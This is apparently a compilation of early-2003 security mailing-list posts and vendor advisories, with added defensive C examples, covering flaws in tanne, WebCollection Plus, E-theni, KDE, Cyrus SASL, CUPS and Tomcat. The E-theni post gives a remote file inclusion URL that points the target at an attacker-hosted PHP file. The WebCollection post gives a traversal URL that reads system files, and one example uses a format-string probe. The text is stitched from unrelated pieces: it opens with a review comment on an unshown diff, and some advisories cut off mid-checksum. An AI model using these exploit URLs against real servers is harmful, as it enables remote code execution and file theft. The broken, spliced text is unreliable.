GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y
--
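Review bot: both hunks make the right change, passing txt as an argument to a constant `"%s"` format, but the fact that the identical fix is needed at lines 65 and 74 shows the whole openlog/vsnprintf/syslog/closelog sequence is duplicated across the #ifdef branches; folding it into one helper means the next fix lands once. A style point on the unchanged context: `vsnprintf( txt, 511, str, args )` hardcodes the buffer size; `sizeof(txt)` (vsnprintf always terminates within the size given) keeps the bound tied to the declaration if txt is ever resized.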
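The format-string defect and its fix above, as an added example written for this page (not tanne's netzio.c and not from the advisory): a logger in the shape of tanne's logger() that applies the patched call, plus a small function that counts how many conversion directives a piece of request data would trigger if it were ever used as a format, which is a useful assertion to run on untrusted strings before they reach any printf-family call. The message text follows the log line in the advisory; the buffer size and the hostile ID are constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Number of conversion directives a string would trigger if it were passed
 * as a printf-style format ("%%" is a literal percent and does not count).
 * For a message built from request data, anything above 0 means the remote
 * side steers the format parser, which is exactly what "%x%x%x%x" did. */
int count_format_directives(const char *s)
{
    int n = 0;

    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Logger in the shape of tanne's logger(), written for this example: the
 * caller's constant format is expanded once into txt, and txt then goes to
 * syslog() as the argument of a constant "%s" format (the patched call),
 * never as the format itself. Returns txt so the result can be checked. */
const char *log_message(char *txt, size_t txtlen, const char *fmt, ...)
{
    va_list args;

    va_start(args, fmt);
    vsnprintf(txt, txtlen, fmt, args);
    va_end(args);
    openlog("Tanne2", LOG_PID, LOG_DAEMON);
    syslog(LOG_INFO, "%s", txt);
    closelog();
    return txt;
}

/* The message from the advisory's log line, with the ID taken from the
 * client. Whatever the ID contains is copied literally into the log text. */
const char *log_id_not_found(const char *client_id)
{
    static char txt[512];           /* constructed size */

    return log_message(txt, sizeof txt, "FATAL: ID (%s) nicht gefunden", client_id);
}

int main(void)
{
    const char *hostile = "%x%x%x%x";   /* constructed, mirrors the nc test */

    printf("directives in \"%s\": %d\n", hostile, count_format_directives(hostile));
    printf("logged text: %s\n", log_id_not_found(hostile));
    return 0;
}
```

With the patched call the logged text is the literal "FATAL: ID (%x%x%x%x) nicht gefunden" rather than the hex stack words the advisory shows; the directive counter is the check a reviewer would add to any function that forwards caller-supplied text.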
Re: ps information leak in FreeBSD
On Thu, Jan 09, 2003 at 02:48:30PM +1100, Damien Miller wrote:
> Crist J. Clark wrote:
> > Any program that asks for a password on the command line should have
> > the common decency to overwrite/obfuscate it, along the lines of,
> >
> >     case 'p':
> >         passwd = optarg;
> >         optarg = "";
> >         break;

This code is incorrect, it destroys a temporary pointer that will be overwritten with the next call to getopt(). For the sake of completeness, it should be noted that to actually destroy the command line argument data, one should do something along the lines of:

    case 'p':
        passwd = strdup(optarg);    /* now requires free()ing. */
        {
            int len = strlen(optarg), i;
            for (i = 0; i != len; ++i)
                optarg[i] = 0;
        }

> That works only for OSs which support argv clobbering - it is by no
> means portable and shouldn't be depended on for security.

This is still correct though. :). Any passwords passed on the command line are available through a race anyway. Just don't do it(tm).

David.
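The copy-then-scrub step from David's reply, as an added example written for this page (not code posted by any participant in the thread): the secret is duplicated to the heap before the argv bytes are zeroed, the zeroing goes through a volatile pointer so the compiler cannot treat the stores as dead, and a probe checks both halves of the result. The argv element is constructed. Damien's caveat stands: this only helps on systems where ps reads the live argv area, and the secret is visible to everyone between exec and the scrub.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Overwrites n bytes through a volatile pointer so the compiler cannot drop
 * the stores as dead writes to memory that is never read again. */
static void scrub(char *p, size_t n)
{
    volatile char *v = p;

    while (n--)
        *v++ = '\0';
}

/* Takes a secret from the argv element getopt handed back: copy it to the
 * heap first (optarg is only a pointer into argv, and the next getopt() call
 * replaces it), then zero the original in place so the argv area that ps(1)
 * reads on some systems no longer holds it. Caller frees the copy. */
char *take_secret_from_arg(char *arg)
{
    char *copy = strdup(arg);

    if (copy != NULL)
        scrub(arg, strlen(arg));
    return copy;
}

/* 1 if all n bytes of p are zero. */
int all_zero(const char *p, size_t n)
{
    while (n--)
        if (*p++ != '\0')
            return 0;
    return 1;
}

/* Constructed argv element; returns 1 when the copy survives intact and the
 * original has been fully scrubbed. */
int scrub_demo(void)
{
    char arg[] = "hunter2";                /* constructed secret */
    char *copy = take_secret_from_arg(arg);
    int ok = copy != NULL
          && strcmp(copy, "hunter2") == 0
          && all_zero(arg, sizeof arg - 1);

    free(copy);
    return ok;
}

int main(void)
{
    printf("copy kept, argv scrubbed: %d\n", scrub_demo());
    return 0;
}
```

The volatile loop is the part that matters in practice: a plain memset() after the last read of the buffer is a dead store the optimizer is entitled to remove, and then the argv area still holds the secret.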
Vulnerability in WebCollection Plus (TM)
These vulnerabilities were found / tested on:

    WebCollection Plus (TM)
    Copyright 2001 Follett Software Company
    Version 5.00 Revision 12-01-A Dec 19 2001

The program protects from reading other non-webserver-accessible files by checking for a ':' or excessive '.'s in a string. If the URL has a '/' at the beginning, it has the effect of reading from C:\. For example, to read C:\bootlog.txt the URL to use is something like:

    http://vulnerableserver/wx/s.dll?d=/bootlog.txt

I found the latest version revision is 5.05, but could not find a 5.05 copy to test on.

The manufacturer of the program was contacted by phone, and the vulnerability was reported to them. Follett Software has not replied concerning this not being submitted to bugtraq, so I have to assume they do not care.

f0urtyfive
www.ceteranet.com
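The check the report above describes (a ':' filter and a count of dots) misses the case it names, a leading '/', because it looks for bad substrings instead of deciding where the path ends up. As an added example written for this page (not WebCollection code), here is the alternative: normalise the requested path lexically, refuse anything absolute or carrying a drive/stream colon, and only accept a ".." that pops a component already inside the root. The document root and the request strings are constructed; nothing touches the disk.

```c
#include <stdio.h>
#include <string.h>

/* Resolves a client-supplied relative path against a fixed document root,
 * returning 0 and the joined path in out, or -1 when the request tries to
 * leave the root. Rules: reject absolute paths (leading '/' or '\'), reject
 * ':' anywhere (drive letters, alternate streams), treat both separators as
 * equivalent, drop "." components, and let ".." pop only previously accepted
 * components, never the root itself. */
int resolve_under_root(const char *root, const char *request, char *out, size_t outlen)
{
    const char *comps[256];
    size_t lens[256];
    int n = 0;
    const char *p = request;

    if (*request == '/' || *request == '\\' || strchr(request, ':') != NULL)
        return -1;

    while (*p) {
        const char *start = p;
        while (*p && *p != '/' && *p != '\\')
            p++;
        size_t len = (size_t)(p - start);
        if (*p)
            p++;                                  /* skip the separator */
        if (len == 0 || (len == 1 && start[0] == '.'))
            continue;                             /* "" or "." */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (n == 0)
                return -1;                        /* would climb above root */
            n--;
            continue;
        }
        if (n == (int)(sizeof comps / sizeof comps[0]))
            return -1;
        comps[n] = start;
        lens[n] = len;
        n++;
    }

    size_t used = (size_t)snprintf(out, outlen, "%s", root);
    if (used >= outlen)
        return -1;
    for (int i = 0; i < n; i++) {
        if (used + 1 + lens[i] + 1 > outlen)
            return -1;
        out[used++] = '/';
        memcpy(out + used, comps[i], lens[i]);
        used += lens[i];
        out[used] = '\0';
    }
    return 0;
}

/* Wrapper with a constructed document root: returns the resolved path, or
 * NULL when the request was rejected. */
const char *resolve_example(const char *request)
{
    static char out[1024];

    return resolve_under_root("/srv/www/wx", request, out, sizeof out) == 0 ? out : NULL;
}

int main(void)
{
    const char *r;

    r = resolve_example("docs/./a/../b.txt");
    printf("docs/./a/../b.txt -> %s\n", r ? r : "(rejected)");
    r = resolve_example("/bootlog.txt");
    printf("/bootlog.txt      -> %s\n", r ? r : "(rejected)");
    return 0;
}
```

On the server side the result should still be opened with a handle-based API that does not re-interpret the string, and the same normalisation has to be applied after URL-decoding, or an encoded separator slips through the check.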
RE: Opentype font file causes Windows to restart.
Tested on Windows NT4 SP6a. Had to force opening with fontview as it was not associated by default. No restart, just the message "Not a valid font file".

-----Original Message-----
From: Andrew [mailto:[EMAIL PROTECTED]]
Sent: 06 January 2003 15:37
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Opentype font file causes Windows to restart.

Problem
-------

The attached OpenType font file will cause Windows to restart immediately when the file is opened by the default viewer (fontview). I doubt anyone would suspect a "harmless" little font file of being able to cause such a thing to happen!

Software affected
-----------------

It has been tested on both Windows 2000 and Windows XP with exactly the same result -- an immediate restart. Other versions of Windows are untested.

Fix
---

No fix known.

- Andrew Connell
Re: A security vulnerability in S8Forum
On Tue, 2003-01-07 at 03:20, Steve Watt wrote:
> In article <[EMAIL PROTECTED]> you write:
> [ snip ]
> > SOLUTION :
> > ==========
> [ snip ]
> > if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$",
> > $email) && $email != "") {
>
> Please note that there are many more characters valid in the LHS of an
> email address, for example +, that are often desirable. Disallowing
> such addresses is a major nuisance.

Indeed. In fact, ANY ASCII character can appear in the local-part of the address, because the local part can be a quoted-string and a quoted-string can contain virtually any ASCII. Then, the domain can be a domain-literal, and this can contain CFWS, which can contain comments. Comments cannot be recognised by a regular expression as comments nest.

RFC 2822 address validation requires knowledge of that standard.

David Wilson
Isode Limited
E-theni (PHP)
Information:
°°°°°°°°°°°°

Version: ?
Website: http://www.theni.freesurf.fr
Problems:
  - Include file
  - phpinfo()

PHP Code/Location:
°°°°°°°°°°°°°°°°°°

/admin_t/include/aff_liste_langue.php:

    require ($rep_include."para_langue.php");

/admin_t/include/find_theni_home.php:

    <?php
    phpinfo();
    ?>

Exploits:
°°°°°°°°°

- http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/
  with: http://[attacker]/para_langue.php
  (This will work only if register_globals=ON)
- http://[target]/admin_t/include/find_theni_home.php

Patches:
°°°°°°°°

In admin_t/include/aff_liste_langue.php, replace the line:

    require ($rep_include."para_langue.php");

by:

    if (file_exists($rep_include."para_langue.php")){
        require ($rep_include."para_langue.php");
    }

and replace the file /admin_t/include/find_theni_home.php by:

    <?php
    session_start();
    if (session_is_registered("USER")==FALSE or $USER[id_user]<1){
        exit;
    } else {
        echo "";
        echo "";
        phpinfo();
        echo "";
    }
    ?>

A patch can be found on http://www.phpsecure.org.

More details:
°°°°°°°°°°°°°

In French: http://www.frog-man.org/tutos/E-theni.txt
Translated by Google: http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
MDKSA-2003:004 - Updated KDE packages fix multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

                Mandrake Linux Security Update Advisory
________________________________________________________________________

Package name:           kde
Advisory ID:            MDKSA-2003:004
Date:                   January 13th, 2003

Affected versions:      8.1, 8.2, 9.0
________________________________________________________________________

Problem Description:

Multiple instances of improperly quoted shell command execution exist in KDE 2.x up to and including KDE 3.0.5. KDE fails to properly quote parameters of instructions passed to the shell for execution. These parameters may contain data such as filenames, URLs, email address, and so forth; this data may be provided remotely to a victim via email, web pages, files on a network filesystem, or other untrusted sources. It is possible for arbitrary command execution on a vulnerable system with the privileges of the victim's account.

The code audit by the KDE team resulted in patches for KDE 2.2.2 and KDE 3; version 3.0.5a was released and the KDE team encourages the upgrade. The listed KDE2 packages have the KDE team's patches applied to provide the fixed code.

References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1393
  http://www.kde.org/info/security/advisory-20021220-1.txt
________________________________________________________________________

Updated Packages:

 Mandrake Linux 8.1:
 48ff0cb4379dc637269bc80620daa1a9  8.1/RPMS/arts-2.2.1-6.2mdk.i586.rpm
 46d9f094efbe6cc27db14c38cd606795  8.1/RPMS/kdebase-2.2.1-7.1mdk.i586.rpm
 69f8e2273fa0a358d9654a0d3203e7e3  8.1/RPMS/kdebase-devel-2.2.1-7.1mdk.i586.rpm
 73362000c7976994348495fb32e500b3  8.1/RPMS/kdebase-nsplugins-2.2.1-7.1mdk.i586.rpm
 468112d4056dfc58ca8b58c4f1ec7be1  8.1/RPMS/kdebase-static-devel-2.2.1-7.1mdk.i586.rpm
 91d004309794e010904852e156071b70  8.1/RPMS/kdegames-2.2.1-1.1mdk.i586.rpm
 d40cd6f4d25a5bfa474f5433050a68c4  8.1/RPMS/kdegames-devel-2.2.1-1.1mdk.i586.rpm
 9fa32248695753cb321682d5ec49ade3  8.1/RPMS/kdegames-static-devel-2.2.1-1.1mdk.i586.rpm
 28eb522af6e204b188e2b28df3a036e4  8.1/RPMS/kdegraphics-2.2.1-2.2mdk.i586.rpm
 741393cf8b937154b009130c7ffdda5e  8.1/RPMS/kdegraphics-static-devel-2.2.1-2.2mdk.i586.rpm
 b500613060b86576b4e84ad496eae977  8.1/RPMS/kdelibs-2.2.1-6.2mdk.i586.rpm
 24cd581953daa85f4f5990d50a45a972  8.1/RPMS/kdelibs-devel-2.2.1-6.2mdk.i586.rpm
 8ca76fe8e649759911906aae876cedbc  8.1/RPMS/kdelibs-sound-2.2.1-6.2mdk.i586.rpm
 f61e9869d03148ed43c170eaac0d72dc  8.1/RPMS/kdelibs-static-devel-2.2.1-6.2mdk.i586.rpm
 8e4ff760a9d0a0e77e1a0824ea4d5d97  8.1/RPMS/kdemultimedia-2.2.1-2.1mdk.i586.rpm
 d2ecc0f681a7fa733da5b2a1f13cf154  8.1/RPMS/kdemultimedia-aktion-2.2.1-2.1mdk.i586.rpm
 fc7da8ce233b36efc6a90717e1944d22  8.1/RPMS/kdemultimedia-devel-2.2.1-2.1mdk.i586.rpm
 c646a64a09659f3fe0f817a96c661c30  8.1/RPMS/kdemultimedia-static-devel-2.2.1-2.1mdk.i586.rpm
 1a81e958d09f2dda4bc676d9edbbec97  8.1/RPMS/kdenetwork-2.2.1-2.1mdk.i586.rpm
 d11dacd9de9e40e9424e74253145e21b  8.1/RPMS/kdenetwork-devel-2.2.1-2.1mdk.i586.rpm
 444a049090631eb2b87f06a1ddaa5938  8.1/RPMS/kdenetwork-static-devel-2.2.1-2.1mdk.i586.rpm
 a47f01c1fb4a8346bb91ddb29c1f1e8f  8.1/RPMS/kdepim-2.2.1-1.1mdk.i586.rpm
 1a2e4c66bf22e8b035f110b5583643be  8.1/RPMS/kdepim-devel-2.2.1-1.1mdk.i586.rpm
 d12a88cf1c37f0b636719de604e0c98e  8.1/RPMS/kdesdk-2.2.1-1.1mdk.i586.rpm
 92aee5b55d89cd9a1233d4f9d4a63475  8.1/RPMS/kdesdk-devel-2.2.1-1.1mdk.i586.rpm
 0186a161325c0d2f1180429fbb2ff1f7  8.1/RPMS/kdesdk-static-devel-2.2.1-1.1mdk.i586.rpm
 c410e2f2a3854abcc10e45ec442f1131  8.1/RPMS/kdeutils-2.2.1-2.1mdk.i586.rpm
 c5f90c1763c6a49b1b7043a1f1777aa1  8.1/RPMS/kdeutils-devel-2.2.1-2.1mdk.i586.rpm
 ac44479d46b23aec1a83d7ccaeab70cc  8.1/RPMS/kdeutils-static-devel-2.2.1-2.1mdk.i586.rpm
 27c6db5818b359e05c1c14ad0fa2449f  8.1/RPMS/libarts2-2.2.1-6.2mdk.i586.rpm
 52b3ac653c8fc6dc301afb14d06e6968  8.1/RPMS/libarts2-devel-2.2.1-6.2mdk.i586.rpm
 8291a6cb79bd1ea80ea09ea1720c5f6f  8.1/SRPMS/kdebase-2.2.1-7.1mdk.src.rpm
 305e43b02c77715f622782ce347217f7  8.1/SRPMS/kdegames-2.2.1-1.1mdk.src.rpm
 1fba584f4b40c5139d7ec0a88d1cc39c  8.1/SRPMS/kdegraphics-2.2.1-2.2mdk.src.rpm
 717de8d0650c6cf5f548098d5a1b62e7  8.1/SRPMS/kdelibs-2.2.1-6.2mdk.src.rpm
 81f058cd556e82801463badb2e8bf5ae  8.1/SRPMS/kdemultimedia-2.2.1-2.1mdk.src.rpm
 cf541f6d78eb5fe7742b35aa1d5c35b8  8.1/SRPMS/kdenetwork-2.2.1-2.1mdk.src.rpm
 95ff817aa54020e50dd77b55a68220cc  8.1/SRPMS/kdepim-2.2.1-1.1mdk.src.rpm
 72bb785fbe96b4ef4fdb39bee1053eda  8.1/SRPMS/kdesdk-2.2.1-1.1mdk.src.rpm
 0d9dee6b9c70263f1d1130782dcf2c4f  8.1/SRPMS/kdeutils-2.2.1-2.1mdk.src.rpm

 Mandrake Linux 8.1/IA64:
 93000191f3b2986a1949460ae8ede1ab  ia64/8.1/RPMS/arts-2.2.1-6.2mdk.ia64.rpm
 ed8221d6d69b98742a536cefa078edb5  ia64/8.1/RPMS/kdebase-2.2.1-7.1mdk.ia64.rpm
 988d5de4aa
[RHSA-2002:283-09] Updated cyrus-sasl packages fix buffer overflows
Red Hat, Inc. Red Hat Security Advisory

Synopsis:          Updated cyrus-sasl packages fix buffer overflows
Advisory ID:       RHSA-2002:283-09
Issue date:        2003-01-07
Updated on:        2003-01-06
Product:           Red Hat Linux
Keywords:          cyrus-sasl buffer overflow flaw:buf
Cross references:
Obsoletes:         RHSA-2001:150
CVE Names:         CAN-2002-1347

1. Topic:

Updated cyrus-sasl packages are now available for Red Hat Linux 8.0. These packages close buffer overflows present in Cyrus SASL 2.1 and later.

2. Relevant releases/architectures:

Red Hat Linux 8.0 - i386

3. Problem description:

Cyrus SASL is an implementation of the Simple Authentication and Security Layer, a method for adding authentication support to connection-based protocols.

Cyrus SASL versions 2 prior to 2.1.10 include a number of buffer overflow vulnerabilities:

- Insufficient buffer length checking in user name canonicalization. This issue would be hard to exploit, but would allow a remote user to execute arbitrary code on the system.

- When performing authentication using LDAP, saslauthd does not allocate enough memory when it needs to escape special characters in the username and realm. This issue may be easy to exploit remotely.

- The log writer might not have allocated memory for the trailing \0 in a message. This issue is probably hard to exploit, although it is possible to affect the logging data with at least anonymous authentication.

All users of Cyrus SASL on Red Hat Linux 8.0 are advised to upgrade to the erratum packages containing Cyrus SASL version 2.1.10, which is not affected by these vulnerabilities. Other Red Hat Linux releases are not affected, as they include Cyrus SASL version 1.5.x.

4. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

    rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs.

Please note that this update is also available via Red Hat Network. Many people find this an easier way to apply updates. To use Red Hat Network, launch the Red Hat Update Agent with the following command:

    up2date

This will start an interactive process that will result in the appropriate RPMs being upgraded on your system.

5. RPMs required:

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/cyrus-sasl-2.1.10-1.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-2.1.10-1.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-devel-2.1.10-1.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-gssapi-2.1.10-1.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-md5-2.1.10-1.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/cyrus-sasl-plain-2.1.10-1.i386.rpm

6. Verification:

MD5 sum                           Package Name
--------------------------------------------------------------------------
e291b7bd71cd69825077aba5a3341764  8.0/en/os/SRPMS/cyrus-sasl-2.1.10-1.src.rpm
0bf0d5b2e17a26e06f1b9e2cd02fdae3  8.0/en/os/i386/cyrus-sasl-2.1.10-1.i386.rpm
80d77339fc5a06bed5073cd34019d9f4  8.0/en/os/i386/cyrus-sasl-devel-2.1.10-1.i386.rpm
877a229ffe46aa7be012f8d69fa1d544  8.0/en/os/i386/cyrus-sasl-gssapi-2.1.10-1.i386.rpm
8568b99569bceb11d237fd302d372113  8.0/en/os/i386/cyrus-sasl-md5-2.1.10-1.i386.rpm
bc69bfc361c0c75c15be0d7557133633  8.0/en/os/i386/cyrus-sasl-plain-2.1.10-1.i386.rpm

These packages are GPG signed by Red Hat, Inc. for security. Our key is available at http://www.redhat.com/about/contact/pgpkey.html

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command:

    md5sum <filename>

7. References:

http://marc.theaimsgroup.com/?l=cyrus-sasl&m=103945455024946
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1347

8. Contact:

The Red Hat security contact is <[EMAIL PROTECTED]>. More contact details at http://www.redhat.com/solutions/security/news/contact.html

Copyright(c) 2000, 2001, 2002 Red Hat, Inc.
[RHSA-2002:295-07] Updated CUPS packages fix various vulnerabilities
Red Hat, Inc. Red Hat Security Advisory

Synopsis:          Updated CUPS packages fix various vulnerabilities
Advisory ID:       RHSA-2002:295-07
Issue date:        2003-01-13
Updated on:        2003-01-09
Product:           Red Hat Linux
Keywords:
Cross references:
Obsoletes:
CVE Names:         CAN-2002-1366 CAN-2002-1367 CAN-2002-1368 CAN-2002-1369
                   CAN-2002-1371 CAN-2002-1372 CAN-2002-1383

1. Topic:

Updated CUPS packages are available for Red Hat Linux 7.3 and 8.0 which fix various security issues.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

The Common UNIX Printing System (CUPS) provides a portable printing layer. A number of vulnerabilities have been discovered in CUPS. CUPS was distributed with Red Hat Linux 7.3 and 8.0 but is not installed by default.

1. An integer overflow exists in the CUPS HTTP interface that allows a local attacker to gain the permissions of the 'lp' user. (CAN-2002-1383)

2. A race condition exists in the creation of a pid file which allows an attacker who already has privileges of the 'lp' user (for example from utilizing a different exploit) to create or overwrite any file as root, leading to arbitrary code execution. (CAN-2002-1366)

3. It is possible to remotely add a printer to CUPS by sending a specially crafted UDP packet. If an attacker utilizes this vulnerability, they could add a printer with a tainted name that if clicked on in the web administration interface could be used to exploit other vulnerabilities. (CAN-2002-1367)

   By utilizing this vulnerability, an attacker could take a number of steps to be able to get hold of the certificate used to access the administrative section of the CUPS server and potentially add a printer that will execute commands with root privileges.

4. Problems with chunked encoding and negative content length handling in the CUPS HTTP interface can cause CUPS to crash. On Red Hat Linux platforms this can cause a denial of service (DoS) against CUPS. (CAN-2002-1368)

5. A number of integer overflows exist in the image handling code of the filters in CUPS. In addition, CUPS does not properly check for zero width GIF images. These vulnerabilities allow an attacker who has the ability to print to run arbitrary code as the 'lp' user. (CAN-2002-1371)

6. An integer overflow exists in the CUPS pdftops filter. This can be exploited by an attacker who is able to print by sending a carefully crafted PDF file which can execute arbitrary commands as the 'lp' user. (CAN-2002-1384)

7. A buffer overflow exists in setting up the job management options. When combined with other vulnerabilities, this could allow a local user to gain root privileges. This issue only affects the version of CUPS shipped with Red Hat Linux 7.3. (CAN-2002-1369)

8. A bug in the select() call would allow an easy DoS attack which would cause CUPS to not recover once the DoS has stopped. (CAN-2002-1372)

Red Hat Linux 7.3 and 8.0 were shipped with versions of CUPS that are vulnerable to these issues. All users of CUPS are advised to upgrade to the erratum packages which contain a patch to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

    rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs.

Please note that this update is also available via Red Hat Network. Many people find this an easier way to apply updates. To use Red Hat Network, launch the Red Hat Update Agent with the following command:

    up2date

This will start an interactive process that will result in the appropriate RPMs being upgraded on your system.

5. RPMs required:

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/cups-1.1.14-15.2.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/cups-1.1.14-15.2.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/cups-devel-1.1.14-15.2.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/cups-libs-1.1.14-15.2.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/cups-1.1.17-0.2.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/cups-1.1.17-0.2.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/cups-devel-1.1.17-0.2.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/cups-libs-1.1.17-0.2.i386.rpm

6. Verification:

MD5 sum                           Package Name
--------------------------------------------------------------------------
cf0832f7db07adf
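Item 5 in the CUPS advisory (integer overflows in the image filters, plus unchecked zero-width GIFs) is the classic dimension-times-depth allocation bug. The following is an added example, not CUPS code: the buggy pattern that multiplies width, height and bytes-per-pixel in 32-bit arithmetic with no range check, beside a hardened version that rejects zero dimensions and checks each multiply before performing it. The 1 GiB cap, the bpp bound and the sample headers are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example, not CUPS code: an image filter that sizes its pixel
 * buffer as width * height * bytes-per-pixel in 32-bit arithmetic, with
 * no range check, can be made to allocate a tiny buffer for a huge image
 * (the product wraps), and a zero width or height gives a zero-length
 * buffer that per-row code still writes into. The hardened version
 * below checks each multiply and rejects degenerate headers. The size
 * cap and the bpp bound are assumptions for this example. */

/* The buggy pattern, kept only to show the wrap. */
uint32_t img_bufsize_unchecked(uint32_t width, uint32_t height, uint32_t bpp)
{
    return width * height * bpp;
}

/* Hardened: returns the byte count, or 0 when the header is rejected
 * (a real image never has size 0 here, so 0 is unambiguous). */
size_t img_bufsize_checked(uint32_t width, uint32_t height, uint32_t bpp)
{
    const uint32_t max_bytes = 0x40000000u;  /* 1 GiB cap: assumption */

    /* Zero width or height is the GIF case the advisory mentions. */
    if (width == 0 || height == 0 || bpp == 0 || bpp > 16)
        return 0;
    /* Divide before multiplying, so the check itself cannot wrap. */
    if (width > max_bytes / bpp)
        return 0;
    uint32_t rowbytes = width * bpp;
    if (height > max_bytes / rowbytes)
        return 0;
    return (size_t)rowbytes * height;
}

/* Allocate the pixel buffer for a header; NULL when rejected or OOM. */
unsigned char *img_alloc(uint32_t width, uint32_t height, uint32_t bpp)
{
    size_t n = img_bufsize_checked(width, height, bpp);
    return n ? calloc(1, n) : NULL;
}

int main(void)
{
    /* Constructed headers: a sane one, a zero-width one, and one whose
     * product is a multiple of 2^32 and so wraps to 0 in 32-bit math. */
    struct { uint32_t w, h, bpp; } hdr[] = {
        { 640, 480, 3 }, { 0, 480, 3 }, { 65536, 65536, 4 },
    };
    for (size_t i = 0; i < sizeof hdr / sizeof hdr[0]; i++) {
        printf("%5u x %5u x %u: unchecked=%u checked=%zu\n",
               hdr[i].w, hdr[i].h, hdr[i].bpp,
               img_bufsize_unchecked(hdr[i].w, hdr[i].h, hdr[i].bpp),
               img_bufsize_checked(hdr[i].w, hdr[i].h, hdr[i].bpp));
    }
    return 0;
}
```

The decode loop that follows such an allocation iterates over the header's claimed width and height, not over the bytes actually allocated, which is why a wrapped or zero-sized buffer turns into a heap overflow running as the filter's user ('lp' here).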
[SECURITY] [DSA 225-1] New tomcat packages fix source disclosure vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 225-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
January 9th, 2003                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : tomcat4
Vulnerability  : source disclosure
Problem-Type   : remote
Debian-specific: no
CVE Id         : CAN-2002-1394

A security vulnerability has been confirmed to exist in Apache Tomcat 4.0.x releases, which allows a specially crafted URL to return the unprocessed source of a JSP page, or, under special circumstances, a static resource which would otherwise have been protected by a security constraint, without the need for being properly authenticated. This is based on a variant of the exploit that was identified as CAN-2002-1148.

For the current stable distribution (woody) this problem has been fixed in version 4.0.3-3woody2.

The old stable distribution (potato) does not contain tomcat packages.

For the unstable distribution (sid) this problem does not exist in the current version 4.1.16-1.

We recommend that you upgrade your tomcat packages.

Installation Instructions
- -------------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody2.dsc
    Size/MD5 checksum:      708 0911f7c03a0ab71133fbe95bf45d0d20
  http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody2.diff.gz
    Size/MD5 checksum:    15881 de9f6f0fb39374bfe4ece1ef4824d942
  http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3.orig.tar.gz
    Size/MD5 checksum:  1588186 2b2e0d859f7152e5225633933e6585d6

Architecture independent components:

  http://security.debian.org/pool/updates/contrib/t/tomcat4/libtomcat4-java_4.0.3-3woody2_all.deb
    Size/MD5 checksum:  1134258 680c67daebdd36eb879ce593e6362f3b
  http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4-webapps_4.0.3-3woody2_all.deb
    Size/MD5 checksum:  1167502 34f71826d8441f967e3da0ee4ab9a1be
  http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody2_all.deb
    Size/MD5 checksum:   126444 e7dbc07086a7e349474bff877342cb6d

These files will probably be moved into the stable distribution on its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
